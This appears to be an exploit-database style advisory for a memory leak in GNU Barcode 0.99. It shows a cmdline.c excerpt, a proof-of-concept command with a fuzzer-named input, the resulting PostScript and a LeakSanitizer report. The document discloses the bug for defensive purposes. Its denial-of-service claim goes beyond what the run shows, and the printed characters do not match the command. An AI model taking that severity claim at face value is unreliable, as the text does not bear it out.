GNU Barcode 0.99 Exploit, Memory Leak

# GNU Barcode 0.99 - Memory Leak
# Vendor: The GNU Project | Free Software Foundation, Inc.
# Product web page: https://www.gnu.org/software/barcode/
# https://directory.fsf.org/wiki/Barcode
# Affected version: 0.99
# Tested on: Ubuntu 16.04.4
# Author: Gjoko 'LiquidWorm' Krstic

# Summary: GNU Barcode is a tool to convert text strings to printed bars.
# It supports a variety of standard codes to represent the textual strings
# and creates postscript output.

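# Desc: GNU Barcode suffers from a memory leak vulnerability, which can be exploited
# by malicious people to cause a DoS (Denial of Service). The vulnerability is
# caused by an error in 'cmdline.c', which can be exploited to cause a
# memory leak via a specially crafted file. The vulnerability is confirmed in
# version 0.99. Other versions may also be affected.
# In the LeakSanitizer report below, the 512-byte direct leak is the getopt_desc
# buffer allocated with calloc() at cmdline.c:132 (shown in the excerpt), which is
# not freed in this run. A second 55-byte allocation made through strdup() is also
# reported. Each is reported as a single object.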

cmdline.c:

128: int commandline(struct commandline *args, int argc, char **argv,
129:                 char *errorhead)
130: {
131:     struct commandline *ptr;
132:     char *getopt_desc = (char *)calloc(512, 1);
133:     int desc_offset = 0;
134:     int opt, retval;
135:     char *value;

lqwrm@metalgear:~/research/barcode-0.99$ ./barcode -b id:000034,sig:06,src:000000,op:havoc,rep:128
%!PS-Adobe-2.0
%%Creator: "barcode", libbarcode sample frontend
%%DocumentPaperSizes: A4
%%EndComments
%%EndProlog

%%Page: 1 1

% Printing barcode for "id:000034,sig:06,src:000000,op:havoc,rep:128", scaled  1.00, encoded using "code 128-B"
% The space/bar succession is represented by the following widths (space first):
% 02112141341111132221411221212411211241142121224111122141142121132221421121412213212211231221231221231221231222211322212311122321142121421121221143212211231222231121122321142121212411411223212211231221231221231221231221231221231221122321341111112423212211224111211244112121341111411221122321212411122141112423212211232212232113112221321132331112
[
%  height  xpos   ypos  width       height  xpos   ypos  width
   [75.00  11.00  15.00  1.85]      [75.00  13.50  15.00  0.85]
   [75.00  16.50  15.00  0.85]      [70.00  21.50  20.00  0.85]
   [70.00  27.00  20.00  3.85]      [70.00  30.50  20.00  0.85]
   [70.00  32.50  20.00  0.85]      [70.00  35.50  20.00  2.85]
   [70.00  40.00  20.00  1.85]      [70.00  43.50  20.00  0.85]
   [70.00  48.50  20.00  0.85]      [70.00  51.00  20.00  1.85]
   [70.00  54.50  20.00  0.85]      [70.00  57.50  20.00  0.85]
   [70.00  62.00  20.00  3.85]      [70.00  65.50  20.00  0.85]
   [70.00  68.50  20.00  0.85]      [70.00  71.00  20.00  1.85]
   [70.00  76.50  20.00  0.85]      [70.00  80.00  20.00  3.85]
   [70.00  84.50  20.00  0.85]      [70.00  87.50  20.00  0.85]
   [70.00  91.00  20.00  1.85]      [70.00  96.50  20.00  0.85]
   [70.00  98.50  20.00  0.85]      [70.00 101.00  20.00  1.85]
   [70.00 104.50  20.00  0.85]      [70.00 109.50  20.00  0.85]
   [70.00 113.00  20.00  3.85]      [70.00 117.50  20.00  0.85]
   [70.00 120.50  20.00  0.85]      [70.00 123.50  20.00  2.85]
   [70.00 128.00  20.00  1.85]      [70.00 131.50  20.00  0.85]
   [70.00 137.00  20.00  1.85]      [70.00 139.50  20.00  0.85]
   [70.00 142.50  20.00  0.85]      [70.00 147.50  20.00  0.85]
   [70.00 151.00  20.00  1.85]      [70.00 154.50  20.00  2.85]
   [70.00 158.50  20.00  0.85]      [70.00 162.00  20.00  1.85]
   [70.00 164.50  20.00  0.85]      [70.00 168.50  20.00  2.85]
   [70.00 172.00  20.00  1.85]      [70.00 175.50  20.00  0.85]
   [70.00 179.50  20.00  2.85]      [70.00 183.00  20.00  1.85]
   [70.00 186.50  20.00  0.85]      [70.00 190.50  20.00  2.85]
   [70.00 194.00  20.00  1.85]      [70.00 197.50  20.00  0.85]
   [70.00 201.50  20.00  2.85]      [70.00 205.00  20.00  1.85]
   [70.00 209.00  20.00  1.85]      [70.00 212.50  20.00  0.85]
   [70.00 215.50  20.00  2.85]      [70.00 220.00  20.00  1.85]
   [70.00 223.50  20.00  0.85]      [70.00 227.50  20.00  2.85]
   [70.00 230.50  20.00  0.85]      [70.00 233.00  20.00  1.85]
   [70.00 237.50  20.00  2.85]      [70.00 241.50  20.00  0.85]
   [70.00 245.00  20.00  3.85]      [70.00 249.50  20.00  0.85]
   [70.00 252.50  20.00  0.85]      [70.00 258.00  20.00  1.85]
   [70.00 260.50  20.00  0.85]      [70.00 263.50  20.00  0.85]
   [70.00 267.00  20.00  1.85]      [70.00 269.50  20.00  0.85]
   [70.00 275.50  20.00  2.85]      [70.00 279.50  20.00  0.85]
   [70.00 283.00  20.00  1.85]      [70.00 285.50  20.00  0.85]
   [70.00 289.50  20.00  2.85]      [70.00 293.00  20.00  1.85]
   [70.00 297.00  20.00  1.85]      [70.00 301.50  20.00  2.85]
   [70.00 304.50  20.00  0.85]      [70.00 307.50  20.00  0.85]
   [70.00 310.00  20.00  1.85]      [70.00 314.50  20.00  2.85]
   [70.00 318.50  20.00  0.85]      [70.00 322.00  20.00  3.85]
   [70.00 326.50  20.00  0.85]      [70.00 329.50  20.00  0.85]
   [70.00 332.50  20.00  0.85]      [70.00 337.00  20.00  3.85]
   [70.00 340.50  20.00  0.85]      [70.00 345.50  20.00  0.85]
   [70.00 348.00  20.00  1.85]      [70.00 352.50  20.00  2.85]
   [70.00 356.50  20.00  0.85]      [70.00 360.00  20.00  1.85]
   [70.00 362.50  20.00  0.85]      [70.00 366.50  20.00  2.85]
   [70.00 370.00  20.00  1.85]      [70.00 373.50  20.00  0.85]
   [70.00 377.50  20.00  2.85]      [70.00 381.00  20.00  1.85]
   [70.00 384.50  20.00  0.85]      [70.00 388.50  20.00  2.85]
   [70.00 392.00  20.00  1.85]      [70.00 395.50  20.00  0.85]
   [70.00 399.50  20.00  2.85]      [70.00 403.00  20.00  1.85]
   [70.00 406.50  20.00  0.85]      [70.00 410.50  20.00  2.85]
   [70.00 414.00  20.00  1.85]      [70.00 417.50  20.00  0.85]
   [70.00 421.50  20.00  2.85]      [70.00 425.00  20.00  1.85]
   [70.00 428.50  20.00  0.85]      [70.00 431.00  20.00  1.85]
   [70.00 435.50  20.00  2.85]      [70.00 439.50  20.00  0.85]
   [70.00 445.00  20.00  3.85]      [70.00 448.50  20.00  0.85]
   [70.00 450.50  20.00  0.85]      [70.00 452.50  20.00  0.85]
   [70.00 457.00  20.00  3.85]      [70.00 462.50  20.00  2.85]
   [70.00 466.50  20.00  0.85]      [70.00 470.00  20.00  1.85]
   [70.00 472.50  20.00  0.85]      [70.00 476.00  20.00  1.85]
   [70.00 481.50  20.00  0.85]      [70.00 483.50  20.00  0.85]
   [70.00 486.50  20.00  0.85]      [70.00 489.00  20.00  1.85]
   [70.00 496.00  20.00  3.85]      [70.00 499.50  20.00  0.85]
   [70.00 502.50  20.00  0.85]      [70.00 505.50  20.00  0.85]
   [70.00 511.00  20.00  3.85]      [70.00 514.50  20.00  0.85]
   [70.00 516.50  20.00  0.85]      [70.00 521.50  20.00  0.85]
   [70.00 524.00  20.00  1.85]      [70.00 527.50  20.00  0.85]
   [70.00 530.00  20.00  1.85]      [70.00 534.50  20.00  2.85]
   [70.00 538.50  20.00  0.85]      [70.00 541.50  20.00  0.85]
   [70.00 546.00  20.00  3.85]      [70.00 549.50  20.00  0.85]
   [70.00 552.00  20.00  1.85]      [70.00 555.50  20.00  0.85]
   [70.00 560.50  20.00  0.85]      [70.00 562.50  20.00  0.85]
   [70.00 567.00  20.00  3.85]      [70.00 572.50  20.00  2.85]
   [70.00 576.50  20.00  0.85]      [70.00 580.00  20.00  1.85]
   [70.00 582.50  20.00  0.85]      [70.00 586.50  20.00  2.85]
   [70.00 591.00  20.00  1.85]      [70.00 594.00  20.00  1.85]
   [70.00 598.50  20.00  2.85]      [70.00 602.50  20.00  0.85]
   [70.00 605.50  20.00  2.85]      [70.00 608.50  20.00  0.85]
   [70.00 612.00  20.00  1.85]      [70.00 615.50  20.00  0.85]
   [70.00 620.00  20.00  1.85]      [70.00 622.50  20.00  0.85]
   [75.00 627.00  15.00  1.85]      [75.00 632.50  15.00  2.85]
   [75.00 635.50  15.00  0.85]      [75.00 638.00  15.00  1.85]

] { {} forall setlinewidth moveto 0 exch rlineto stroke} bind forall
[
%   char    xpos   ypos fontsize
    [(o)   21.00  10.00 12.00]
    [(/)   32.00  10.00  0.00]
    [(c)   43.00  10.00  0.00]
    [(r)   54.00  10.00  0.00]
    [(a)   65.00  10.00  0.00]
    [(s)   76.00  10.00  0.00]
    [(h)   87.00  10.00  0.00]
    [(e)   98.00  10.00  0.00]
    [(s)  109.00  10.00  0.00]
    [(/)  120.00  10.00  0.00]
    [(i)  131.00  10.00  0.00]
    [(d)  142.00  10.00  0.00]
    [(:)  153.00  10.00  0.00]
    [(0)  164.00  10.00  0.00]
    [(0)  175.00  10.00  0.00]
    [(0)  186.00  10.00  0.00]
    [(0)  197.00  10.00  0.00]
    [(3)  208.00  10.00  0.00]
    [(4)  219.00  10.00  0.00]
    [(,)  230.00  10.00  0.00]
    [(s)  241.00  10.00  0.00]
    [(i)  252.00  10.00  0.00]
    [(g)  263.00  10.00  0.00]
    [(:)  274.00  10.00  0.00]
    [(0)  285.00  10.00  0.00]
    [(6)  296.00  10.00  0.00]
    [(,)  307.00  10.00  0.00]
    [(s)  318.00  10.00  0.00]
    [(r)  329.00  10.00  0.00]
    [(c)  340.00  10.00  0.00]
    [(:)  351.00  10.00  0.00]
    [(0)  362.00  10.00  0.00]
    [(0)  373.00  10.00  0.00]
    [(0)  384.00  10.00  0.00]
    [(0)  395.00  10.00  0.00]
    [(0)  406.00  10.00  0.00]
    [(0)  417.00  10.00  0.00]
    [(,)  428.00  10.00  0.00]
    [(o)  439.00  10.00  0.00]
    [(p)  450.00  10.00  0.00]
    [(:)  461.00  10.00  0.00]
    [(h)  472.00  10.00  0.00]
    [(a)  483.00  10.00  0.00]
    [(v)  494.00  10.00  0.00]
    [(o)  505.00  10.00  0.00]
    [(c)  516.00  10.00  0.00]
    [(,)  527.00  10.00  0.00]
    [(r)  538.00  10.00  0.00]
    [(e)  549.00  10.00  0.00]
    [(p)  560.00  10.00  0.00]
    [(:)  571.00  10.00  0.00]
    [(1)  582.00  10.00  0.00]
    [(2)  593.00  10.00  0.00]
    [(8)  604.00  10.00  0.00]
]   { {} forall dup 0.00 ne {
  /Helvetica findfont exch scalefont setfont
    } {pop} ifelse
    moveto show} bind forall
% End barcode for "id:000034,sig:06,src:000000,op:havoc,rep:128"

showpage
%%Trailer

==2183==ERROR: LeakSanitizer: detected memory leaks

Direct leak of 512 byte(s) in 1 object(s) allocated from:
    #0 0x7fcb3aca179a in __interceptor_calloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x9879a)
    #1 0x407be2 in commandline /home/lqwrm/research/barcode-0.99/cmdline.c:132

Direct leak of 55 byte(s) in 1 object(s) allocated from:
    #0 0x7fcb3aca1602 in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x98602)
    #1 0x7fcb3a8ca489 in __strdup (/lib/x86_64-linux-gnu/libc.so.6+0x8b489)

SUMMARY: AddressSanitizer: 567 byte(s) leaked in 2 allocation(s).
